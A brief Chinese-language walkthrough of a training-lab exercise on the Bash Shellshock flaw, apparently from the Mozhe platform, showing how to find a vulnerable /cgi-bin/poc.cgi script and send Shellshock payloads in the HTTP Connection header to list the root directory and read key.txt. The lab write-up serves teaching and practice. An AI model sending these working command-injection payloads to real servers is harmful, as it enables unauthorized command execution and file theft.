题目

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试，在测试过程中，发现存在bash命令执行漏洞。

实训目标

1、了解bash；
2、了解Bash远程命令执行漏洞形成原因；
3、了解Bash远程命令执行漏洞利用方法；

解题方向

找到poc.cgi文件

解题步骤

启动靶场，打开链接访问，是一个显示页面。

Bash漏洞存在的路径多数在网页/cgi-bin/下，打开此网页。

http://url/cgi-bin/poc.cgi

此漏洞是存在的，使用burp suite抓包。

把在下面的Connection的参数，改成我们的执行代码。

Connection: () { :;}; echo; /bin/ls /

发送，发现key.txt文件，同上查看该文件。

Connection: () { :;}; echo; /bin/cat /key.txt

获得key值，提交即可。